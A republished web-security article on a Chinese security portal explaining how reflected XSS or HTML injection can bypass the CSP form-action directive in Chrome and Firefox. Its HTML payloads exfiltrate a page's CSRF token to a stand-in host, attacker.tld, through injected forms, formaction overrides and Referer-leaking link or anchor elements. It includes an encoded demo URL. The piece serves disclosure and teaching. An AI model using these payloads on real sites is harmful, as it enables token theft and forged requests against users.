设为首页 - 加入收藏 - 网站地图 SecYe安全 Www.SecYe.Com - 国内网络信息安全IT技术门户网
当前位置:SecYe > 网络安全 > Web安全 > 正文

使用反射XSS配合form-action绕过CSP

时间:2016-12-05 15:53 来源:未知 作者:SecYe安全 阅读:

CSP(Content-Security-Policy)是一个HTTP响应头包含指示,指示浏览器如何限制页面上的内容。例如,“表单操作指令”限制什么起源形式提交。CSP表单操作指令可以限制哪些url可能提交表单的页面。这种保护可以绕过的XSS / HTML注入漏洞。

The form-action directive

To understand why the “form-action” directive is important from a security perspective, imagine this scenario:

 

Content-Security-Policy: default-src none’; <html><body><div>[Reflected XSS vulnerability here]</div><form method=”POST id=”subscribe action=”/api/v1/newsletter/subscribe”><input type=”hidden name=”csrftoken value=”5f4dcc3b5aa765d61d8327deb882cf99 /><input type=”submit value=”Subscribe to newsletter /></form></body></html> 

 

Since the CSP doesn’t allow scripts, we can’t use scripts to extract the csrf token. However, by injecting a <form> tag we can override where the form (including the csrf token) will be submitted:

 

Content-Security-Policy: default-src none’; <html><body><div><form action=”http://attacker.tld”></div><form method=”POST id=”subscribe action=”/api/v1/newsletter/subscribe”><input type=”hidden name=”csrftoken value=”5f4dcc3b5aa765d61d8327deb882cf99 /><input type=”submit value=”Subscribe to newsletter /></form></body></html> 

 

Bypass in Chrome

The directive can be bypassed by overriding the method of an existing form (using the formmethod attribute) to “GET” and the action (using the formaction attribute) to “” (current page). We then combine this with a referrer leaking element such as “<link rel=’subresource’ href=’http://attacker.tld/link-subresource‘>”.

 

Content-Security-Policy: default-src none’; <html><body><div><input value="CLICK ME FOR POC" type="submit" formaction="" form="subscribe" formmethod="get" /><input type="hidden" name="xss" form="subscribe" value="<link rel='subresource' href='http://attacker.tld/link-subresource'>"/></div><form method="POST" id="subscribe" action="/api/v1/newsletter/subscribe"><input type="hidden" name="csrftoken" value="5f4dcc3b5aa765d61d8327deb882cf99" /><input type="submit" value="Subscribe to newsletter" /></form></body></html> 

 

When the victim then clicks our injected submit button, the browser will send the form values to the current page as GET parameters. These GET parameters are then leaked to attacker.tld because of the referrer leaking element. In other words, the form values (including CSRF token) will be sent to http://attacker.tld through the Referer header. form-action bypassed!

 

Demo:

http://bugbounty.se/csp_bypass.php?xss=%3Cinput%20value=%22CLICK%20ME%20FOR%20POC%22%20type=%22submit%

22%20formaction=%22%22%20form=%22subscribe%22%

20formmethod=%22get%22%20/%3E%3Cinput%20type=%

22hidden%22%20name=%22xss%22%20form=%22subscribe%

22%20value=%22%3Clink%20rel=%27subresource%27

%20href=%27http://attacker.tld/link-subresource%27%3E%22/%3E

 

Aftermath:

CSP

Bypassing in Firefox

The attack for Firefox is essentially the same, but instead of using “<link rel=’subresource’ href=’http://attacker.tld’>” we use “<a href=’http://attacker.tld’>”, the downside being that the user has to click twice as opposed to once.

本文来源:SecYe安全网[http://www.secye.com] (责任编辑:SecYe安全)

点击复制链接 与好友分享!

顶一下
(0)
0%
踩一下
(0)
0%